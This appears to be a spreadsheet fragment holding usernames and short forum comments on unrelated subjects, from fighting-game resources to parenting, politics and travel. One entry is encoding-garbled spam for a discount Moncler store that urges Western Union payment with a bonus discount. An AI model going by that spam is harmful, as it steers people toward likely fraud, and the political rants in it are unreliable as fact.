Shade](https://itunes.apple.com/us/podcast/street-fighter-podcast/id1208392483?mt=2) &gt; - [The Kasanova Podcast](https://twitter.com/MekelKasanova) &gt; - [Eventhubs Podcast](https://eventhubs.podbean.com/) &gt; - [The Gauntlet](https://twitter.com/gauntletcast?lang=en) ### Street Fighter V Character Data &amp; Move Lists |||||| |-|-|-|-|-| | [Rashid](https://game.capcom.com/cfn/sfv/character/rsd) | [R. Mika](https://game.capcom.com/cfn/sfv/character/rmk) | [ChunLi](https://game.capcom.com/cfn/sfv/character/cnl) | [Ryu](https://game.capcom.com/cfn/sfv/character/ryu) | [Ken](https://game.capcom.com/cfn/sfv/character/ken) | | [Cammy](https://game.capcom.com/cfn/sfv/character/cmy) | [Laura](https://game.capcom.com/cfn/sfv/character/lar) | [Zangief](https://game.capcom.com/cfn/sfv/character/zgf) | [Karin](https://game.capcom.com/cfn/sfv/character/krn) | [Nash](https://game.capcom.com/cfn/sfv/character/nsh) | | [M.Bison](https://game.capcom.com/cfn/sfv/character/veg) | [Birdie](https://game.capcom.com/cfn/sfv/character/brd) | [Vega](https://game.capcom.com/cfn/sfv/character/blr) | [Necalli](https://game.capcom.com/cfn/sfv/character/ncl) | [Dhalsim](https://game.capcom.com/cfn/sfv/character/dsm) | | [F.A.N.G](https://game.capcom.com/cfn/sfv/character/fan) | [Alex](https://game.capcom.com/cfn/sfv/character/alx) | [Guile](https://game.capcom.com/cfn/sfv/character/gul) | [Ibuki](https://game.capcom.com/cfn/sfv/character/ibk) | [Balrog](https://game.capcom.com/cfn/sfv/character/bsn) | | [Juri](https://game.capcom.com/cfn/sfv/character/jri) | [Urien](https://game.capcom.com/cfn/sfv/character/urn) | [Akuma](https://game.capcom.com/cfn/sfv/character/gok) | [Kolin](https://game.capcom.com/cfn/sfv/character/kln) | [Ed](https://game.capcom.com/cfn/sfv/character/ed) | | [Abigail](https://game.capcom.com/cfn/sfv/character/abg) | [Menat](https://game.capcom.com/cfn/sfv/character/mnt) | [Zeku](https://game.capcom.com/cfn/sfv/character/zku) | [Sakura](https://game.capcom.com/cfn/sfv/character/skr) | [Blanka](https://game.capcom.com/cfn/sfv/character/blanka) | | [Falke](https://game.capcom.com/cfn/sfv/character/falke) | [Cody](https://game.capcom.com/cfn/sfv/character/cody) | [G](https://game.capcom.com/cfn/sfv/character/g) | [Sagat](https://game.capcom.com/cfn/sfv/character/sagat) | [Kage](https://game.capcom.com/cfn/sfv/character/kage) | | [E.Honda](https://game.capcom.com/cfn/sfv/character/ehonda) | [Lucia](https://game.capcom.com/cfn/sfv/character/lucia) | [Poison](https://game.capcom.com/cfn/sfv/character/poison) | ### [Character Discussion Index for character specific combos, tips and matchups](https://www.reddit.com/r/StreetFighter/wiki/v/character_discussion) ### General FAQ 1. **I'm new to SFV and this is overwhelming! What do I do?** * Go read the amazing /u/Joe_Munday's [**Gief's Gym** series](https://www.reddit.com/r/StreetFighter/comments/4dxgc1/written_tutorials_for_sfv_basic_to_advanced/)! * Check out [**useful resources on the sub**](https://www.reddit.com/r/StreetFighter/wiki/index/#resource)! * Join the [New Challenger Discord](https://discord.gg/vSVHPVW)! * **Where can I find a basic overview of each character?** * [**SFV Character Roster**](/r/StreetFighter/wiki/index#wiki_street_fighter_v) * [**USFIV Character Roster**](/r/StreetFighter/wiki/index#wiki_street_fighter_iv) * **What does _____ mean?** * Check out our [**glossary**](/r/streetfighter/wiki/iv/glossary)! * There's also a good glossary of terms on [**IPlayWinner**](http://iplaywinner.com/glossary)! * **Where can I find combos?** * Check out the [**Character Discussions**](https://www.reddit.com/r/StreetFighter/wiki/v/character_discussion/#WCD). * **How can I stop being bad?** * [**Scrub mentality**](http://www.sirlin.net/articles/playing-to-win) * [**Losing to yourself**](https://www.reddit.com/r/StreetFighter/comments/2xs9pp/article_series_losing_to_yourself_xpost_rsf4/) * **Are there other Fighting Game communities?** * [**Shoryuken Forums**](http://forums.shoryuken.com/ ) * [**/r/Kappa**](/r/Kappa) (NSFW) * [**/r/Salty**](/r/Salty) (NSFW) * [**4chan FGG**](https://boards.4chan.org/vg/fgg) (NSFW) * **Where can I find replays?** * [**Capcom Fighters**](https://www.youtube.com/user/CapcomFightersTV/videos) (tournament footage) * [**YogaFlame24**](https://www.youtube.com/user/YogaFlame24/videos) (pro online ranked matches) * [**levelupseries**](https://www.twitch.tv/leveluplive/videos/all) (west coast tournaments, weeklies, and tutorials) * [**Team Spooky**](https://www.youtube.com/user/teamspooky/videos) (east coast tournaments, and weeklies) * **Can my computer handle Street Fighter V?** * Click [here](http://www.capcom-unity.com/haunts/blog/2015/09/22/street-fighter-v-pc-spec-recommendations) to see Street Fighter V PC Recommended Specs! * **What's Footsies?** * See the [**Footsie Handbook**](http://sonichurricane.com/?page_id=1702), and [**Juicebox's Sermon**](https://www.youtube.com/watch?v=FQQCan5oo90) * **Execution problems?** * See the [**SRK Execution Guide**](http://shoryuken.com//forum/index.php?threads/srk-newbie-saikyo-dojo-execution-guide-read-me.102691/) * **Advanced Techniques?** * Behold the glory that is the info dump! [Option selects](http://www.youtube.com/watch?v=aHHoGHcgK9k), [hit confirms](http://www.youtube.com/watch?v=eDMboPnznJc), [negative edge and input shortcuts](http://www.youtube.com/watch?v=_laZyBnClDQ), [input buffering](http://www.youtube.com/watch?v=SbhlZUPFxII), [tiger knee motion and kara cancel](http://www.youtube.com/watch?v=1rGjrBLHumk), [plinking](http://www.youtube.com/watch?v=PfP3oj_8oXM), [pianoing](http://www.youtube.com/watch?v=bmx_mnW9h-Q), [sliding](http://www.youtube.com/watch?v=x6RhIUyEuws), [double tapping](http://www.youtube.com/watch?v=yulm5TFOmRU), [links and frame data](https://www.reddit.com/r/SF4/comments/28li8f/how_do_i_use_frame_data_to_know_what_combos_into/), and [safe jumps](https://www.youtube.com/watch?v=XqpiyuwRstw).</t>
  </si>
  <si>
    <t>RexRippin</t>
  </si>
  <si>
    <t>To me it looks alright, def not one of you’re coolest Ano’s or best looking work IMO.</t>
  </si>
  <si>
    <t>irritable_sophist</t>
  </si>
  <si>
    <t>Bee puke that is to say.</t>
  </si>
  <si>
    <t>Sunshine0806</t>
  </si>
  <si>
    <t>My youngest is 13 months and the toys we use everyday are the little tikes swing, various balls and cars, Soft blocks or mega blocks, fisher price piggy bank toy, and fisher price car toy (Fisher-Price Laugh &amp; Learn Smart Stages Crawl Around Car, Blue www.amazon.com/dp/B00UCWQMZ8/ref=cm... ). It is kind of big but well worth it. He does have other toys but these are his favorites. I let my family buy whatever they want. I give recommendations but I don’t expect others to follow. I always give my child a chance to like a toy and enjoy it. The crappy ones break quickly and are tossed and the rest are rotated and donated when no longer liked by my child or me.</t>
  </si>
  <si>
    <t>midnitte</t>
  </si>
  <si>
    <t>&gt; The two men, who helped Giuliani investigate former vice president Joe Biden, were charged with campaign finance violations, according to a person familiar with the charges. Amazing how quickly this is moving.</t>
  </si>
  <si>
    <t>ioachimwern</t>
  </si>
  <si>
    <t>Re: Jimmy Choo Steckdose venta moncler outlet moncler Cheap salida Moncler Jackets en lÃ*nea Moncler baratos Cheap salida Moncler Jackets en lÃ*nea Profesional Moncler Outlet Chaqueta tienda, jacketscoat.co US Dollar Euro GB Pound Canadian Dollar Australian Dollar Jappen Yen Norske Krone Swedish Krone Danish Krone CNY Productos Moncler Abrigos Mujer Moncler Chaquetas Hombres Chal Moncler Moncler Abrigos Hombres Moncler Chalecos Hombres Moncler Chalecos Mujeres Moncler Chaquetas Mujeres Los mÃ¡s vendidos Nuevas adquisiciones! Moncler Acorus Euramerican chaqueta de estilo para mÃ* [5b8e][/url] €926.28 €286.44Ahorre: 69% descuento Moncler Abajo Chaleco unisex con capucha brillante postal pÃºrpura [038a] Moncler Abajo Chaleco unisex con capucha brillante postal pÃºrpura [038a] €610.08 €171.12Ahorre: 72% descuento Destacado - [todos] Moncler mÃºltiples logotipo Hombres Y Mujeres Abajo chaqueta con capucha Negro [2ff7] €807.24 €228.78Ahorre: 72% descuento Baratos Moncler Chaleco sin mangas Mujeres Zip Negro [80e2] Baratos Moncler Chaleco sin mangas Mujeres Zip Negro [80e2] €819.33 €208.32Ahorre: 75% descuento Moncler ClÃ¡sico abajo cubre Mujeres cremallera cuello de piel con cinturÃ³n Kahki [bbba] €922.56 €281.79Ahorre: 69% descuento Casa :: NAVBAR_TITLE HEADING_TITLE 1.VISA Card We are through the VISA Card Company to accept your payment! When you create the order information on our site, you could choose to pay the bill via Visa, which is absolutely secure. You could check on www.visa.com to make sure its security. (1) NOTE: If returned as DECLINED, please call your bank and tell them to unblock your deal. VISA Card is easy and safe to make an online purchase with. Please feel free to contact us if you need further help. (2) Possible reasons for payment declined: 1. Guests did not correctly fill out payment information 2. Issuing bank does not support online shopping 3. Guest card balance is not enough 4. Guests have an adverse payment records which did not pass the VISA Card filtration system (non-payment, document deception etc.) 2 Master Card Master Card is also a very easy and quick way to send and receive money when doing transactions. You could pay the bill via Master Card,which is absolutely secure. You could check on www.mastercard.com to make sure its security. Please feel free to contact us if you need further help. 3. Western Union: Western Union are very welcome. You will get a 20% discount when you use it. Steps: (1) Please calculate your total amount (2) Deduct the 20% money (3) Transfer the left money to us by Western Union (4) Send us the information(MTCN, total amount, country) at the page of Contact Us . How to use Western Union: Our Official Western Union Information:First Name,Last Name,Country Western Union has three payment methods: (1) Using Cash, Credit, or Debit Cards to send money through online. Supported by Australia, Canada, European countries and United States. The steps are: Firstly, access to the western Union's home Site: http://www.westernunion.com/ and choose your country. Secondly, sign in your Western Union account or create a new one. Thirdly, click "send money", fill in the Money Transfer form and click "continue". Fourthly, fill in the form with your information (billing address, name, phone number, and your card number) Sometimes, you need to confirm your transfer as the email from Western Union tells you. (2) transferring at a western union agent location. You may visit http://www.westernunion.com/info/age...country=global to find which one is the nearest and fill in a form. And the staff there will help you to complete the payment. (3) by your phone Notice: (1) When finish the transaction, the system will give you the MTCN (10 digits). (2) Please write them down and then send MTCN with your remitterÂ¡Â¯s (payerÂ¡Â¯s) name (First name, Last Name), the exact delivery address, total amount (USD) to us at the page of Contact Us . If your currency is not in USD, you do not have to exchange it into USD, which will be done automatically by the western Union. But please do not set the currency into the one that you actually use at the website of western union or at the location of western union, which will automatically be transformed into USD in number. Please tell us the amount in USD in the end and then your order will go through. (3) Please feel free to Contact Us by email or Live Chat if you need further help. We will dispatch your order once we receive your information. Please feel free to contact us if you need further help. AtrÃ¡s \ n Casa EnvÃ*o Comercio al por mayor Rastreo de orden Cupones MÃ©todos de pago ContÃ¡ctenos Tabla de tallas Moncler Hombres Abrigos Moncler Hombres Chaquetas Moncler Mujeres Abrigos Moncler Mujeres Chaquetas Moncler Chaleco Copyright Â© 2012-2016 Todos los derechos reservados. venta moncler outlet moncler Share Share this post on Digg Del.icio.us Technorati Twitter</t>
  </si>
  <si>
    <t>bilatzeko</t>
  </si>
  <si>
    <t>For Italy (in Italian): [https://www.brocardi.it/testo-unico-pubblica-sicurezza/titolo-iii/capo-ii/art109.html](https://www.brocardi.it/testo-unico-pubblica-sicurezza/titolo-iii/capo-ii/art109.html)</t>
  </si>
  <si>
    <t>Dadlayz</t>
  </si>
  <si>
    <t>Cops always talk about a horse being worth 10 men on the ground. Just the sheer intimidation aspect of having a towering ball of muscle advancing on you.</t>
  </si>
  <si>
    <t>powellandy1</t>
  </si>
  <si>
    <t>@DCA-IT wrote: I have also seen that running the /SEC or /SECFIX after the fact would reslve the permissions problem but have not tried this yet. It seems like there should be a way forward without having to run two scripts to achieve one task, but my hope could be in vain...</t>
  </si>
  <si>
    <t>Steve_Danger_Gaming</t>
  </si>
  <si>
    <t>Definitely not all Christians are bad people or homophobes. But there's no denying there's a large amount of people calling themselves Christians and claiming to have Christian values while referencing the Bible as the source of their beliefs.</t>
  </si>
  <si>
    <t>str8line</t>
  </si>
  <si>
    <t>babe said: ↑ Lies. Trump has tried to be an inclusive administration, has been willing to work with people who have views other than his own, has understood that the establishment requires continuity in many ways, believing reasonable and practical agreements can be found. The Dems have gone whole hog on accusing him of everything they do themselves, but never get called out on, because a lot of progressives and others who see a different future world goal simply do not get the scrutiny from the entirely onboard Media pushing for such views. Making America Great Again is not their plan. They want an America that is level with China, India, Russia, and some other lesser lights, countries with absolute oligarchy and corporate-centered governance. It is fascism in it's simplest reality people are powerless without the money and angles of influence money buys politicians are scooping up payola like the Bidens. what must be most interesting to Xi and Putin is why would Americans believe government isn't run that way. It's the only way they know. Everything else is just propaganda and lies. That's the New World Order of the Bushes, the Clintons, and the Washington establishment. That's the grand convenience of "globalism": bought and paid for management of everything, by the rich, for the rich. Because that's how you have to play if you want to be in the game. In another thread one of the leading most respected members of JFC was explaining why what the Bidens do is just normal in business today. Every corporation will pay for figurehead connected "board members" to buy their way into "The Mainsteam". JFC members mostly, from the evidence in here, really see nothing wrong with that. So it has always been just about sacking Trump and his MAGA political supporters. Nothing more, certainly with no honest considerations. Well, probably a lot more corrupt than I could even tell. And this is what Colton wants, and what Jason wants, and what Kicky wants. This whole site is all about selling that corrupt elitist load. If you don't think you are just that kind of person, break ranks with the mob and demand investigation of Hillary, Obama, Biden, the whole swamp, right along with Trump and his players. Demand audit of the Fed. Demand Civil Service laws that will remove corrupt actors efficiently. Buy the Tribune and make it an honest rag, not an oligarch wipe. Treat people with respect when they speak the truth. Click to expand... For the love of God, Babe, please smoke some pot or eat some shrooms. Your brain needs to be re-calibrated.</t>
  </si>
  <si>
    <t>amandalynne81</t>
  </si>
  <si>
    <t>I came here to say the same thing. Therapy works wonders. Talking through those feelings and anger will help her. Having a child doesn’t make things automatically better. Babies are work. They depend on someone else for EVERYTHING. You’ll both be sleep deprived, and emotions will be heightened. It’s best to get everything resolved between you 2 before bringing a kid into the equation.</t>
  </si>
  <si>
    <t>lascott24</t>
  </si>
  <si>
    <t>How does that happen?? It starts to decompose so there isn’t anything “holding stuff” together ?</t>
  </si>
  <si>
    <t>japroct</t>
  </si>
  <si>
    <t>Military rarely does anyway....they use new. Just wondering because I am seeing them gain popularity, but mainly for atv type off road uses. Thanx for the info.</t>
  </si>
  <si>
    <t>Blackout774</t>
  </si>
  <si>
    <t>Top to bottom: 1) Polish WZ-29 (non-matching, scrubbed receiver with a circled "Z" which I believe to mean this was probably an export model built for Spanish Civil War service, and probably rebuilt after that war) 2) Yugo M48 (also non-matching, but possibly my favorite shooter) 3) Spanish M1916 (matching, one of the Samco-imported stock that was re-chambered in 7.62x51mm for Spain's NATO standardization)</t>
  </si>
  <si>
    <t>anon-190895</t>
  </si>
  <si>
    <t>Thanks for the read but by saying he allows the universe to function by itself could cause several problems Such as could god escape from a black hole if one was to be put in form? God created the universe but can he break or bend its rules This In turn causes god to be not omnipotent because he allows these things to happen as said with the lines “Every word of God proves true” (Proverbs 30:5). So god cannot lie therefore he is not all powerful?</t>
  </si>
  <si>
    <t>Bilal-Z</t>
  </si>
  <si>
    <t>they are a start up creating a project from scratch. for that you need in house talent who will be there long term and probably under NDA.</t>
  </si>
  <si>
    <t>llMadmanll</t>
  </si>
  <si>
    <t>And super broken to the point that everything else is super unfun to play because they can never reach how op the strikers are</t>
  </si>
  <si>
    <t>Seacreature99</t>
  </si>
  <si>
    <t>You won't get any sympathy on here I'm afraid! Anything you say relating to eTA is just taken as a slight against Canada &amp; you will get a gloating 'suck it up sunshine' response.</t>
  </si>
  <si>
    <t>xfinity12345</t>
  </si>
  <si>
    <t>Ok. So you can expect a letter arriving like 3 months after the previous step. BUT if you can contact someone else who just went through this, you'll be able to circumvent the letter. I believe it involves going to the NVC website for US Embassy in Canada and knowing where to click. You then click that you're a K1 and were told by letter to schedule an interview + medical exam. You'll have to plug in some data like your A number, or the DS90 confirmation, or something. You'll then have to pay and I believe it'll let you schedule. I would recommend you search around on FB or Visa Journey and find some Canadian who just went through this, and ask them to show you their letter (with their sensitive bits blacked out ofc).</t>
  </si>
  <si>
    <t>AbeBigMoney</t>
  </si>
  <si>
    <t>No probably not, my family is very traditional. Nothing went thru a legal process</t>
  </si>
  <si>
    <t>aelin_galathynius_</t>
  </si>
  <si>
    <t>One shot for Lynels, too</t>
  </si>
  <si>
    <t>iguessithink</t>
  </si>
  <si>
    <t>It would be good. I guess...I think</t>
  </si>
  <si>
    <t>maintainglitches</t>
  </si>
  <si>
    <t>Tolerance like “I don’t care if I do pizzas I’m getting down the mountain”?</t>
  </si>
  <si>
    <t>fantapants69</t>
  </si>
  <si>
    <t>Im carrying a horn at alk times</t>
  </si>
  <si>
    <t>holdmybroccoli</t>
  </si>
  <si>
    <t>Without telling her what test you were running? Is that ethical?</t>
  </si>
  <si>
    <t>Mehdzzz</t>
  </si>
  <si>
    <t>Extra heavy</t>
  </si>
  <si>
    <t>blackaxes132</t>
  </si>
  <si>
    <t>hello im trying to join clash with my friends but they play on a different server ( im on euw and they are on eune) so i made a new account on eune and i barely got it to level 29 so im wondering if i have to join the clash team on the first day or not because i dont think i will make it on time. TLDR: can i join a clash team after clash started?</t>
  </si>
  <si>
    <t>madamelex</t>
  </si>
  <si>
    <t>I haven’t voted in years and don’t know much about the candidates. Does anyone know how someone who isn’t up on current events/party stances can decide who to vote for? Or Is it better to not vote if you don’t know anything?</t>
  </si>
  <si>
    <t>countdooku1729</t>
  </si>
  <si>
    <t>Any link to the interviews where he said the same about Star Wars back in the day?</t>
  </si>
  <si>
    <t>40kfreak</t>
  </si>
  <si>
    <t>Well then we should subsidize contraception, mandate comprehensive sex education, fix the adoption system, pass legislation forcing maternity/paternity leave, offer free daycare for working parents, and have a healthcare system that allow prenatal and post natal care. If we use our tax dollars to empower people to make the best decisions now, we dont need to worry about abortions as much *later*</t>
  </si>
  <si>
    <t>TopperHarley007</t>
  </si>
  <si>
    <t>The fact that you think Monetary Policy is in anyway related to "trickle-down economics" shows how uninformed you are.</t>
  </si>
  <si>
    <t>Xam_xar</t>
  </si>
  <si>
    <t>NAH. She probably just wants a name that feels like it still belongs to the family. She's going to have a difficult time and it's familiar to her and it's comforting. Talk to her about it calmly don't blow up like you did. Also she's your sister. Not your brother.</t>
  </si>
  <si>
    <t>Wafflemelon1</t>
  </si>
  <si>
    <t>Every site I've been on says that windows 7 can support DX11, but I can't download it for some reason. I tried using the installer from microsoft-it says I have it updated to the max. However, the game I want to run still says I need to download DX11, and when I check dxdiag, it says I only have DX10.1. The microsoft page says it can only be downloaded by service package, but I already have it downloaded. Any help is appreciated!</t>
  </si>
  <si>
    <t>Zranka</t>
  </si>
  <si>
    <t>I wanted to maximize our chances of getting pregnant, plus the had been on for a while and wanted to see how my body could recover.</t>
  </si>
  <si>
    <t>tall_but_funny</t>
  </si>
  <si>
    <t>Do they talk about it constantly?</t>
  </si>
  <si>
    <t>English Dave</t>
  </si>
  <si>
    <t>Ask Saudi Crown Prince Mohammad bin Salman about the murder of Jamal Khashoggi. Did we put sanctions on Saudi Arabia for this man's murder in an Embassy? Money, money, money. That's why they get away with it.</t>
  </si>
  <si>
    <t>Comic</t>
  </si>
  <si>
    <t>Lad look, She catches i am basically dead, she puts down an orb, try to run, she fades, i won’t even make it 15 meters before she catches me. What I am saying is that if she catches i am doomed, unless i am a pro, which i am not.</t>
  </si>
  <si>
    <t>PinkPearMartini</t>
  </si>
  <si>
    <t>I can understand why he didn't until told to. The dog's actions were proving his case. That must've been so hard though... unable to pick up the dog you haven't seen in ages, who so desperately begs for your affection.</t>
  </si>
  <si>
    <t>Se7enLC</t>
  </si>
  <si>
    <t>Is "put the mike up to the speaker" an option?</t>
  </si>
  <si>
    <t>tameoraiste</t>
  </si>
  <si>
    <t>Exactly. As much as a poison Ed has been at the club (he hired Ole), Ole couldn't see any other viable midfielders in the world other than Longstaff.</t>
  </si>
  <si>
    <t>thehairyprincess</t>
  </si>
  <si>
    <t>Which countries can? I'll VPN into one and check.</t>
  </si>
  <si>
    <t>tmsvdw</t>
  </si>
  <si>
    <t>Dappled light hitting the trees and shrubs in the Tombstone Territorial Park in the Yukon. This was taken as early as the end of August, which is when the tundra carpet starts to change color. I spent just over a week backpacking trip in these remote lands to do as much photography as possible - which meant little sleep as the aurora made an appearance almost every night. Great times. **Technical stuff**: Sony A7RIII, 70-300 @ 223mm, f5.6, 1/400s, ISO 160. Post processing in LR, PS. I have some more images from this and other trips up on my IG ([tmsvdw](https://instagram.com/tmsvdw/)).</t>
  </si>
  <si>
    <t>HasaDiga-Eebowai</t>
  </si>
  <si>
    <t>I once met an ‘influencer’, I could tell he was an ‘influencer’ because he wouldn’t shut the fuck up about it. That guy was an asshole.</t>
  </si>
  <si>
    <t>AvengesTheStorm</t>
  </si>
  <si>
    <t>Good on you man, I did the same thing after playing HS from day 1. Eternal seems like a really good alternative (been playing non-stop in my free time for 3 days)</t>
  </si>
  <si>
    <t>ironoxide11</t>
  </si>
  <si>
    <t>I am coming to Nashville for 4 days in November and am looking at AirBNBs in both Germantown and Wedgewood-Houston. Which area would be better to stay for a group of upper 20's people? Any insight is much appreciated!</t>
  </si>
  <si>
    <t>Powerful_Kangaroo</t>
  </si>
  <si>
    <t>Many of you assert there is no change over last year's adult application, and you're correct. BUT - at some point in the last two years, the BSA has changed the wording significantly - from [this](https://ibb.co/yQnFCkd) to [this](https://ibb.co/1MCg6dP). Read them both very carefully. If you applied before 2018, you MUST agree to the new terms. When I asked a lawyer to look at the new wording, she advised me not to sign unless I wanted to give up my family's privacy to not only the BSA, but anyone associated with them. She also suggested that this data could be sold. Please, have an attorney look at the new agreement if you don't understand it.</t>
  </si>
  <si>
    <t>DuckMustaine</t>
  </si>
  <si>
    <t>Bruce Arians is a legend.</t>
  </si>
  <si>
    <t>MuppetManiac</t>
  </si>
  <si>
    <t>Pumpkin pie is a dessert. Stuffing the actual turkey is -food safety wise - problematic, but we serve stuffing/dressing cooked separately. My family doesn’t prefer cranberry stuffing. We do cranberry sauce and sage stuffing. White wine or iced tea are the typical beverages at thanksgiving in my house, though we also serve lemonade and water. Your menu sounds just fine for a party of 4. I serve a minimum of 14 each year so my menu is a bit... expanded. We have roasted turkey, ham, Brussels sprouts, green beans with mushrooms, stuffing, rolls, mashed potatoes, mashed sweet potatoes, creamed corn, cranberry sauce, roasted zucchini and summer squash and sometimes parsnips. We have a salad, deviled eggs, pickles and olives for appetizers. There’s usually a spice cake and a couple of pies. I’ve done blueberry, apple, pumpkin, sweet potato, pecan, coconut cream, banana cream, and lemon meringue pies in the past.</t>
  </si>
  <si>
    <t>disorderliesonthe401</t>
  </si>
  <si>
    <t>Plot twist: they'll be stabbed to death by....Jeffrey Epstein</t>
  </si>
  <si>
    <t>AvidAddict777</t>
  </si>
  <si>
    <t>*80% Scalie, though that subgroup intertwines with the main group to such a degree they become indistinguishable. In other words, I don’t blame you at all for mixing them up.</t>
  </si>
  <si>
    <t>babypizza22</t>
  </si>
  <si>
    <t>Also it should be said that just because your parents didn’t move from A to B and you have to start at A doesn’t mean you can’t make it to B.</t>
  </si>
  <si>
    <t>Cassie-O</t>
  </si>
  <si>
    <t>5 hours ago, Roger the Dodger said: It might be one for @Cassie-O if she likes Pikachu (who ever that is!) Brings me back to my childhood, collecting the Pokemon trading cards!</t>
  </si>
  <si>
    <t>dirkin1</t>
  </si>
  <si>
    <t>Every time I check the print I give the spool a spin. The trick is to keep your other hand on the spool so it doesn't go ape shit on you.</t>
  </si>
  <si>
    <t>Iswontshutup</t>
  </si>
  <si>
    <t>So, we all know that everyone is responsible for their own actions. He ultimately has the choice. However, if you truly care about this person, you might be able to invite him to events that don’t include alcohol (or create them if events without alcohol aren’t natural to you.). You said you have no other time to do stuff, fine, but you haven’t explained why there always HasssSss to be alcohol. Listen, I am a drinker, so I have no judgement; IMO, everything is much funner and more bearable with alcohol. I have anxiety and depression, so I identify with this guy a bit, but I am also pretty functional, so I identify with you too. Maybe you are feeling a little guilty and came here for some reassurance... How about a compromise? Don’t leave him out of social events... if he is gonna drink at home alone which will dig him deeper into his depression hole, invite him; if he finds out his only friends are icing him out cuz of his “problem” it could make shit worse. But, if you care about this person, I challenge you to actually make an impact and help them.... have events without alcohol or encourage responsible drinking. Make time. Talk with them one on one thoughtfully, and not to prove to your other friends you’re not an “enabler.” There is a compromise to be made here, and you could end up really helping this person. Good luck</t>
  </si>
  <si>
    <t>DaHell_IsDat</t>
  </si>
  <si>
    <t>&gt; Listen up. The bill of extradition isn't even a valid reason to protest in the first place. Listen up, it’s a complete waste of time to read any further. You’re so obvious.</t>
  </si>
  <si>
    <t>6ya staff</t>
  </si>
  <si>
    <t>My elna 3007 keeps stitching like 2 stitches forward and back in same spot. Can't change stitches.</t>
  </si>
  <si>
    <t>&gt;&gt;68783231 Thanks bro. All in all, no matter the outcome: Nids win? The world will probably remain untouched for ages. And remain the same with the hive just self feeding. Ultramarines win? The world will look the same act the same, but there will be more Orks and such, and imperium could properly settle on it.</t>
  </si>
  <si>
    <t>RelaxPrime</t>
  </si>
  <si>
    <t>So? You figure out the emissions for developed nations, those that aren't yet can then become developed without emissions. It's not a population problem, population isn't causing emissions, hence the greatly varying emissions per capita around the world.</t>
  </si>
  <si>
    <t>StuffandThings85</t>
  </si>
  <si>
    <t>That shows they are probably not doing it for themselves, but to impress others. They just assume you're doing the same.</t>
  </si>
  <si>
    <t>&gt;&gt;122658920 Its the social norm and literally like less than 20 bucks it barely costs me anything and these people kinda get screwed if i dont. Id rather not have to, but its simply the world we live in. Bur you already knew this.</t>
  </si>
  <si>
    <t>DarkWorld97</t>
  </si>
  <si>
    <t>Have you read the manga? They are literally just following the manga. Zenitsu also has crazy range. He's fantastic and conveying emotion. Hell, Inosuke showed some good range during the last few episodes too.</t>
  </si>
  <si>
    <t>Cendol10Y</t>
  </si>
  <si>
    <t>Why dont you put the salt water inside the aquatuner room to heat it up and let the steam power the turbine and the water ll be cool by a cooling room that is fill with cooling pipes run by the aquaturner. Uses about 400w to power the aquatuner when it reach it maximum efficiency because the turbine ll generate electric for the aq too</t>
  </si>
  <si>
    <t>JonathanYippy04</t>
  </si>
  <si>
    <t>Are your Chest slots full?</t>
  </si>
  <si>
    <t>Scared_of_stairs_LOL</t>
  </si>
  <si>
    <t>Maybe if you cry harder the rest of the world will suddenly be on your side. Keep trying, you can do it</t>
  </si>
  <si>
    <t>Krillsey</t>
  </si>
  <si>
    <t>It’s funny how Blizz could have just avoided all this by simply saying “No politics at our gaming events please, thanks”. It’s not so much the actions they took, but how they communicated their reasoning to their fans. I think in the past Blizz PR has been the best ever, but they do seem to drop the ball more and more lately.</t>
  </si>
  <si>
    <t>portemanteau</t>
  </si>
  <si>
    <t>[Really?](https://www.google.com/search?q=aglaonema+modestum&amp;client=safari&amp;hl=en-us&amp;prmd=isvn&amp;source=lnms&amp;tbm=isch&amp;sa=X&amp;ved=0ahUKEwjSvrmHkJ7lAhUf7XMBHYEVDRYQ_AUIFigB&amp;biw=375&amp;bih=553)</t>
  </si>
  <si>
    <t>BR Shopper</t>
  </si>
  <si>
    <t>A little heavier denim so good for cooler/cold weather. Great grey color goes with everything. Perfect fit, slim but not tight. Good stretch too.</t>
  </si>
  <si>
    <t>HDF0FinallyOfficial</t>
  </si>
  <si>
    <t>What did you use to make this? Try expanding your canvas size so the star powers can be seen. If you can't expand your canvas size, then try another program like paint.net</t>
  </si>
  <si>
    <t>Felsmile</t>
  </si>
  <si>
    <t>Thank you :) may get back to you soon for one</t>
  </si>
  <si>
    <t>dmdolby</t>
  </si>
  <si>
    <t>You look like Aaron Gillespie from Underoath...if he did meth</t>
  </si>
  <si>
    <t>&gt;&gt;810926666 Nice quads Also &gt;lets make them even more angry! that will work! lmao</t>
  </si>
  <si>
    <t>RetroAcorn</t>
  </si>
  <si>
    <t>That Jill would make a great tattoo!!</t>
  </si>
  <si>
    <t>gometrule</t>
  </si>
  <si>
    <t>&gt; Idk what to tell you. You can tell me whatever you want. But I'm going to laugh at you when you seriously argue that we should disregard all polling and just listen to your anecdotal conversations.</t>
  </si>
  <si>
    <t>lousy_at_handles</t>
  </si>
  <si>
    <t>More like a cyst than cancer, but yeah?</t>
  </si>
  <si>
    <t>ianonuanon</t>
  </si>
  <si>
    <t>It’s transpore tape and should still work.</t>
  </si>
  <si>
    <t>ConclusionsAndClouds</t>
  </si>
  <si>
    <t>I do both when I go to the gym. Usually I’ll run to the gym and back, do cardio, lifting and some yoga/stretching. So a mixed bag of exercises! Once I feel like I have a good base of strength I’m going to get someone to help me put together a plan that’s more geared towards strictly lifting! Hopefully that answers your question</t>
  </si>
  <si>
    <t>&gt;&gt;73072432 I prefer that to be honest. I don't trust human to lead humanity, human nature cause it to be inevitably be corrupt, but if you build the AI good enough, it'll be our grandest and last achievement, we are done after that.</t>
  </si>
  <si>
    <t>dsixlm</t>
  </si>
  <si>
    <t>Yummy dick bro! Good job on keeping it clean!</t>
  </si>
  <si>
    <t>BlueLightning888</t>
  </si>
  <si>
    <t>I knew that. I just looked up pictures of the real flag and you’re correct, it’s reversed. Imma go ahead and change that. I won’t remove the post though.</t>
  </si>
  <si>
    <t>ajfaivkd0553_5</t>
  </si>
  <si>
    <t>I did the same thing with It. Never thought a thousand page book could go so fast.</t>
  </si>
  <si>
    <t>QueenofAshes-</t>
  </si>
  <si>
    <t>You can have the opinion that you thought it was a bad movie or you just don’t want to see it and that’s fine. But when you purposefully spread the media driven fear mongering that it’s going to cause a thousand mass shootings and one movie is going to cause people to snap and go on a killing spree? No shit I’m going to disagree with you. You’re no better than the media that’s being paid to spread fear about this movie.</t>
  </si>
  <si>
    <t>bhaak</t>
  </si>
  <si>
    <t>Yes, an intensity modifier but decreasing the intensity. In the sense of "don't panic, keep calm and just do it".</t>
  </si>
  <si>
    <t>thekingofreapers</t>
  </si>
  <si>
    <t>The Mitochondria is the powerhouse of the cell</t>
  </si>
  <si>
    <t>jermjoy201</t>
  </si>
  <si>
